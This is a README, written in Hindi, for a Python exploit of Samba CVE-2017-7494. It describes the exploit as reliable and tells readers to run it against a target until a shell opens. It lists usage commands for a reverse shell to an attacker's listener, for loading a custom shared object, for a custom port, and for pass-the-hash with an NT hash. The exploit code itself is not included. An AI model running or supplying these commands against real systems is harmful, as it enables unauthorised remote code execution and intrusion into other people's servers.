
CVE-2017-7494 python एक्सप्लॉइट
SAMBA CVE-2017-7494 भेद्यता के लिए रिमोट एक्सप्लॉयट, जिसे is_know_pipename भी कहा जाता है!
यह एक्सप्लॉयट 3 भागों में विभाजित है:
जब तक लक्ष्य भेद्य है और पेलोड लक्ष्य ऑपरेटिंग सिस्टम और आर्किटेक्चर के लिए सही है, एक्सप्लॉयट काफी विश्वसनीय है।
अपने लक्ष्य के विरुद्ध एक्सप्लॉयट चलाएं और शेल खुलने तक प्रतीक्षा करें:
$ python noSAMBAnoCRY.py -r RHOST
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort
samba संस्करण 3.5.0 > 3.6.0 के लिए, आपको बस -o 1 तर्क जोड़ना होगा
python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1
अपना स्वयं का कस्टम .so चलाएं
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so
कस्टम samba पोर्ट के लिए -p तर्क का उपयोग करें
$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port
यदि आप smbpasswd हैश पर आ जाते हैं और उन्हें क्रैक नहीं कर सकते, तो आप अब --hashes=LM:NT तर्क का उपयोग करके पास-द-हैश कर सकते हैं
$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP
यह रिपॉजिटरी रिपॉजिटरी: joxeankoret/exploit-CVE-2017-7494 और Archivaldo से प्रेरित है